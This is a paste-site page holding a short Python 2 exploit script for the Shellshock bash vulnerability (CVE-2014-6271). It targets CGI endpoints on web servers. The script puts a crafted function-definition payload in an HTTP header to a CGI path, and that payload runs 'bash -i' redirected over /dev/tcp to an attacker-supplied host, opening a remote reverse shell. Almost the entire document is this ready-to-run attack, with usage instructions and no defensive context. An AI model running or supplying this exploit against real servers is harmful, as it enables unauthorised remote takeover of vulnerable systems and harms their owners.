SHARE
TWEET

Untitled

a guest Sep 24th, 2014 73,334 Never
  1. #
  2. #CVE-2014-6271 cgi-bin reverse shell
  3. #
  4.  
  5. import httplib,urllib,sys
  6.  
  7. if (len(sys.argv)<4):
  8.         print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
  9.         print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
  10.         exit(0)
  11.  
  12. conn = httplib.HTTPConnection(sys.argv[1])
  13. reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
  14.  
  15. headers = {"Content-type": "application/x-www-form-urlencoded",
  16.         "test":reverse_shell }
  17. conn.request("GET",sys.argv[2],headers=headers)
  18. res = conn.getresponse()
  19. print res.status, res.reason
  20. data = res.read()
  21. print data
RAW Paste Data
Top